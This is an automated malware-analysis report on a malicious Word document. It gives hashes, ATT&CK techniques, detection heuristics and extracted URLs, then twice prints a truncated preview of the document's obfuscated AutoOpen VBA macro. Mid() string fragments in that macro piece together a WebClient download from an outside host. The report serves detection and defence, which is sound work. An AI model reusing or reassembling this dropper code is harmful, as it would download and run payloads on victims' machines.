Office (OLE) malware analysis — malicious · d007c2ec4483fcd4

MALICIOUS

Office (OLE)

295.0 KB Created: 2018-01-04 15:16:00 Authoring application: Microsoft Office Word First seen: 2018-01-08

MD5: 8aa6fbeffbafd1f6a884d8e210ca3e52 SHA-1: 2655389bee1a47414f0be75d17701e2fae296d79 SHA-256: d007c2ec4483fcd4dbf67233956b194d3a3a46426f700282ea7b01785a10fc50

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a legacy WordBasic AutoOpen macro that utilizes the Shell() function. This indicates an attempt to execute external code, likely to download and run a secondary payload. The presence of obfuscated URLs and the ClamAV detection signature 'Img.Dropper.PhishingLure-6443153-0' further support a malicious dropper functionality.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://wjtT+jtTww.j In document text (OLE body)
- http://www.4GJH1kPiatW8RiWIviwjiw�In document text (OLE body)
- http://www.4GJH1kPiatW8RiWIviwjiwIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 112571 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	112571 bytes
SHA-256: `4e05268c825a6302e1221910a59cf7787b7fac87c76d1365abe4b7dec99e3e08`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "LqkjuiTGV" Function UIIanfdZXCA() On Error Resume Next BFULLPF = 90 / Sqr(5) + BThWMsvVF / CBool(nqaTnLq * Sin(461)) * (6739 - 4 / (YEvwUjzumfduQE * RfzsfLWMhJ + VTksowFcU - ChrB(3))) + 90 / Sqr(5) + REzwWSFQrK / CBool(iTIooSLiBrOn * Sin(461)) * (6739 - 4 / (NjJurfo * kwAaAuItQwpwj + AbDAfutShDQvl - ChrB(3))) wBBJdsRKmlZ = 90 / Sqr(5) + PwXPWkvMqmBw / CBool(cQOjwujmaHsZK * Sin(461)) * (6739 - 4 / (qmKVKsijcc * qtYAipFMLLFuA + MjvopfpLN - ChrB(3))) + 90 / Sqr(5) + ZjRqEIw / CBool(lqFAHlsSmMwLl * Sin(461)) * (6739 - 4 / (JEwInrnzAijTa * YOICORJ + KLcJwWsd - ChrB(3))) qbdKYzkPFQv = AFMiUMZcGJ + Mid("KBVR'.NjtT+jtTet.WebjtT+jtTCjtT+jtTljtBN1T9fw7N06FkJ9u", 5, 34) + oVIhMGP zBiasawNcdb = 90 / Sqr(5) + ILYMVuwVINnYC / CBool(luYoWZfiqqzuv * Sin(461)) * (6739 - 4 / (QzKEISkEX * clpfTqMHrEh + ibZLKaVhMbzj - ChrB(3))) + 90 / Sqr(5) + LDjPkEj / CBool(vMkkAOzdsC * Sin(461)) * (6739 - 4 / (kiTifzHJjqRBm * bIndsGzA + iPoaKLVDT - ChrB(3))) mCuwjTGaf = 90 / Sqr(5) + frEimiSKjZwLaF / CBool(bTkONifiPCqzT * Sin(461)) * (6739 - 4 / (TwjbYXmHVwYA * CFPjuZWQpH + jSzIojwjz - ChrB(3))) + 90 / Sqr(5) + McPkChEUzl / CBool(NGdcAVvZwWipT * Sin(461)) * (6739 - 4 / (FYdSpCpABpcAwr * RwrVaSMWfoLAJ + AinvpzJ - ChrB(3))) JzRwrpQYi = 90 / Sqr(5) + kSqXwwOmz / CBool(dLAQRZadEDi * Sin(461)) * (6739 - 4 / (EqzlEID * dQMLHCNujw + uhjURYquaZSm - ChrB(3))) + 90 / Sqr(5) + jfNzZLtFidwM / CBool(pIPMjwIUnXVVjN * Sin(461)) * (6739 - 4 / (OduLdffcp * UVDdMElHS + ifNsViMsIsdt - ChrB(3))) pZXkSdhCZ = IwarVDRduz + Mid("DYSqrEbfFis0G1BKbJ2wd+2wdT1, 343245jtT+jtT);5jtT+jtTtIjtT+jtThjtT+jtTuas jtT+jtT=jtT+jtT jtT+jtT5tIenv:2wd+2wdpubl2wd+2wdic jtT+jtT+ UHjtT+jtTWjtTbpwkYjs2k", 19, 128) + iLwcZGMAAvrj CjkPHzEj = 90 / Sqr(5) + BIjAMFnAAYE / CBool(famTtctCzidB * Sin(461)) * (6739 - 4 / (wAHpEGuiquj * aGGifnmwcXaw + BNDHdXihVO - ChrB(3))) + 90 / Sqr(5) + jLvRJzo / CBool(CjTVmTSqrFD * Sin(461)) * (6739 - 4 / (ZKUCtrbNWFE * sBBUrUn + jvtnirQnKjm - ChrB(3))) luPHkqTJV = 90 / Sqr(5) + iizbOHXzIriAsi / CBool(EFphOaO * Sin(461)) * (6739 - 4 / (sFnrZOjjhU * MhjkNXIRqSWa + lssUNaqZ - ChrB(3))) + 90 / Sqr(5) + JEVaQwiZLw / CBool(KWYVUcJGIYH * Sin(461)) * (6739 - 4 / (ifGjVOTHdI * YfPmHJiQHZvwO + XzkRkQvChq - ChrB(3))) NaMmpDXTSf = 90 / Sqr(5) + CaoDpScnEU / CBool(dwwVFIlwLUN * Sin(461)) * (6739 - 4 / (VMhPJrvCEKY * rjXTizaYRl + AbzUjsUUzo - ChrB(3))) + 90 / Sqr(5) + SqHCTvJSbTZadW / CBool(RRMupNjsjoLX * Sin(461)) * (6739 - 4 / (JjpZhvQj * bffPwKAb + TwzaDHF - ChrB(3))) KHSVDKw = SnjVqsYRXaJ + Mid("hotTrapas jtT+jtT2wd+2wd= 5tIj'+'tT+jtTnsjtKBrUBzrINU8wcQ8", 3, 41) + bNdlRzzXSariRj TUibdWlU = 90 / Sqr(5) + JRMLroBBiAqFpB / CBool(ZIzzjjrMwOiqtr * Sin(461)) * (6739 - 4 / (VzZrwrWEQltwjT * uuPnrnCkGORE + zIwIJjisj - ChrB(3))) + 90 / Sqr(5) + DFDDjLqjItRTob / CBool(AITMScj * Sin(461)) * (6739 - 4 / (IHHmknAooOwLi * kSYQiJLzdUXDJ + LjNWXRvvcZF - ChrB(3))) SwMSGZqi = 90 / Sqr(5) + bbDCQMU / CBool(JGPJYnPjHVvFr * Sin(461)) * (6739 - 4 / (uUHuFQLciCbbav * JssuadZtDiKo + uUvfKhjiv - ChrB(3))) + 90 / Sqr(5) + GEjjcMhzNT / CBool(wdDKRQUaDLubsi * Sin(461)) * (6739 - 4 / (HwRtOwOW * quwzhVlzVTwr + VsQLHrKMcnwSF - ChrB(3))) QzsClXds = 90 / Sqr(5) + QtoqzKiBGUYcH / CBool(zDLsLYAqkRo * Sin(461)) * (6739 - 4 / (YRibUESb * SjJorPV + qFLHBhWSQo - ChrB(3))) + 90 / Sqr(5) + oaJWCpm / CBool(TizUJjaiT * Sin(461)) * (6739 - 4 / (DUJiUtM * BWkLJEPRmfJ + HwEwCqqk - ChrB(3))) OaZHalnilo = HEcFsPWLXAnBzX + Mid("3D7EDDT2ULkiTwvDXHv56DsBbwhi+jtTc.orjtT+jtTg/jtT+jtTsGfjtT+jtTyVQ7/2'+'wd+2wd,http://wjtT+jtTww.j'+'tT+'+'jtTm'+'edjtT+jtTnjtT+jtT'+'uclearjtT+jtTpej'+'tT+jtTru.jtT+jtTcom/jtT+jtTPjtT+jtTvjtT+jtT9rxao/UHW.jt8BQ", 29, 179) + KdnPhiZdIAZ BCkKBrHlFG = 90 / Sqr(5) + fTFAjGSTWTXt / CBool(azGZlRPaYcDr * Sin(461)) * (6739 - 4 / (LZNHzibjFd * TMkZCWwoN + kOWOMBpK - ChrB(3))) + 90 / Sqr(5) + qBI ... (truncated)

SHA-256: 4e05268c825a6302e1221910a59cf7787b7fac87c76d1365abe4b7dec99e3e08

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "LqkjuiTGV"
Function UIIanfdZXCA()
On Error Resume Next
BFULLPF = 90 / Sqr(5) + BThWMsvVF / CBool(nqaTnLq * Sin(461)) * (6739 - 4 / (YEvwUjzumfduQE * RfzsfLWMhJ + VTksowFcU - ChrB(3))) + 90 / Sqr(5) + REzwWSFQrK / CBool(iTIooSLiBrOn * Sin(461)) * (6739 - 4 / (NjJurfo * kwAaAuItQwpwj + AbDAfutShDQvl - ChrB(3)))
wBBJdsRKmlZ = 90 / Sqr(5) + PwXPWkvMqmBw / CBool(cQOjwujmaHsZK * Sin(461)) * (6739 - 4 / (qmKVKsijcc * qtYAipFMLLFuA + MjvopfpLN - ChrB(3))) + 90 / Sqr(5) + ZjRqEIw / CBool(lqFAHlsSmMwLl * Sin(461)) * (6739 - 4 / (JEwInrnzAijTa * YOICORJ + KLcJwWsd - ChrB(3)))
qbdKYzkPFQv = AFMiUMZcGJ + Mid("KBVR'.NjtT+jtTet.WebjtT+jtTCjtT+jtTljtBN1T9fw7N06FkJ9u", 5, 34) + oVIhMGP
zBiasawNcdb = 90 / Sqr(5) + ILYMVuwVINnYC / CBool(luYoWZfiqqzuv * Sin(461)) * (6739 - 4 / (QzKEISkEX * clpfTqMHrEh + ibZLKaVhMbzj - ChrB(3))) + 90 / Sqr(5) + LDjPkEj / CBool(vMkkAOzdsC * Sin(461)) * (6739 - 4 / (kiTifzHJjqRBm * bIndsGzA + iPoaKLVDT - ChrB(3)))
mCuwjTGaf = 90 / Sqr(5) + frEimiSKjZwLaF / CBool(bTkONifiPCqzT * Sin(461)) * (6739 - 4 / (TwjbYXmHVwYA * CFPjuZWQpH + jSzIojwjz - ChrB(3))) + 90 / Sqr(5) + McPkChEUzl / CBool(NGdcAVvZwWipT * Sin(461)) * (6739 - 4 / (FYdSpCpABpcAwr * RwrVaSMWfoLAJ + AinvpzJ - ChrB(3)))
JzRwrpQYi = 90 / Sqr(5) + kSqXwwOmz / CBool(dLAQRZadEDi * Sin(461)) * (6739 - 4 / (EqzlEID * dQMLHCNujw + uhjURYquaZSm - ChrB(3))) + 90 / Sqr(5) + jfNzZLtFidwM / CBool(pIPMjwIUnXVVjN * Sin(461)) * (6739 - 4 / (OduLdffcp * UVDdMElHS + ifNsViMsIsdt - ChrB(3)))
pZXkSdhCZ = IwarVDRduz + Mid("DYSqrEbfFis0G1BKbJ2wd+2wdT1, 343245jtT+jtT);5jtT+jtTtIjtT+jtThjtT+jtTuas jtT+jtT=jtT+jtT jtT+jtT5tIenv:2wd+2wdpubl2wd+2wdic jtT+jtT+ UHjtT+jtTWjtTbpwkYjs2k", 19, 128) + iLwcZGMAAvrj
CjkPHzEj = 90 / Sqr(5) + BIjAMFnAAYE / CBool(famTtctCzidB * Sin(461)) * (6739 - 4 / (wAHpEGuiquj * aGGifnmwcXaw + BNDHdXihVO - ChrB(3))) + 90 / Sqr(5) + jLvRJzo / CBool(CjTVmTSqrFD * Sin(461)) * (6739 - 4 / (ZKUCtrbNWFE * sBBUrUn + jvtnirQnKjm - ChrB(3)))
luPHkqTJV = 90 / Sqr(5) + iizbOHXzIriAsi / CBool(EFphOaO * Sin(461)) * (6739 - 4 / (sFnrZOjjhU * MhjkNXIRqSWa + lssUNaqZ - ChrB(3))) + 90 / Sqr(5) + JEVaQwiZLw / CBool(KWYVUcJGIYH * Sin(461)) * (6739 - 4 / (ifGjVOTHdI * YfPmHJiQHZvwO + XzkRkQvChq - ChrB(3)))
NaMmpDXTSf = 90 / Sqr(5) + CaoDpScnEU / CBool(dwwVFIlwLUN * Sin(461)) * (6739 - 4 / (VMhPJrvCEKY * rjXTizaYRl + AbzUjsUUzo - ChrB(3))) + 90 / Sqr(5) + SqHCTvJSbTZadW / CBool(RRMupNjsjoLX * Sin(461)) * (6739 - 4 / (JjpZhvQj * bffPwKAb + TwzaDHF - ChrB(3)))
KHSVDKw = SnjVqsYRXaJ + Mid("hotTrapas jtT+jtT2wd+2wd= 5tIj'+'tT+jtTnsjtKBrUBzrINU8wcQ8", 3, 41) + bNdlRzzXSariRj
TUibdWlU = 90 / Sqr(5) + JRMLroBBiAqFpB / CBool(ZIzzjjrMwOiqtr * Sin(461)) * (6739 - 4 / (VzZrwrWEQltwjT * uuPnrnCkGORE + zIwIJjisj - ChrB(3))) + 90 / Sqr(5) + DFDDjLqjItRTob / CBool(AITMScj * Sin(461)) * (6739 - 4 / (IHHmknAooOwLi * kSYQiJLzdUXDJ + LjNWXRvvcZF - ChrB(3)))
SwMSGZqi = 90 / Sqr(5) + bbDCQMU / CBool(JGPJYnPjHVvFr * Sin(461)) * (6739 - 4 / (uUHuFQLciCbbav * JssuadZtDiKo + uUvfKhjiv - ChrB(3))) + 90 / Sqr(5) + GEjjcMhzNT / CBool(wdDKRQUaDLubsi * Sin(461)) * (6739 - 4 / (HwRtOwOW * quwzhVlzVTwr + VsQLHrKMcnwSF - ChrB(3)))
QzsClXds = 90 / Sqr(5) + QtoqzKiBGUYcH / CBool(zDLsLYAqkRo * Sin(461)) * (6739 - 4 / (YRibUESb * SjJorPV + qFLHBhWSQo - ChrB(3))) + 90 / Sqr(5) + oaJWCpm / CBool(TizUJjaiT * Sin(461)) * (6739 - 4 / (DUJiUtM * BWkLJEPRmfJ + HwEwCqqk - ChrB(3)))
OaZHalnilo = HEcFsPWLXAnBzX + Mid("3D7EDDT2ULkiTwvDXHv56DsBbwhi+jtTc.orjtT+jtTg/jtT+jtTsGfjtT+jtTyVQ7/2'+'wd+2wd,http://wjtT+jtTww.j'+'tT+'+'jtTm'+'edjtT+jtTnjtT+jtT'+'uclearjtT+jtTpej'+'tT+jtTru.jtT+jtTcom/jtT+jtTPjtT+jtTvjtT+jtT9rxao/UHW.jt8BQ", 29, 179) + KdnPhiZdIAZ
BCkKBrHlFG = 90 / Sqr(5) + fTFAjGSTWTXt / CBool(azGZlRPaYcDr * Sin(461)) * (6739 - 4 / (LZNHzibjFd * TMkZCWwoN + kOWOMBpK - ChrB(3))) + 90 / Sqr(5) + qBI
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.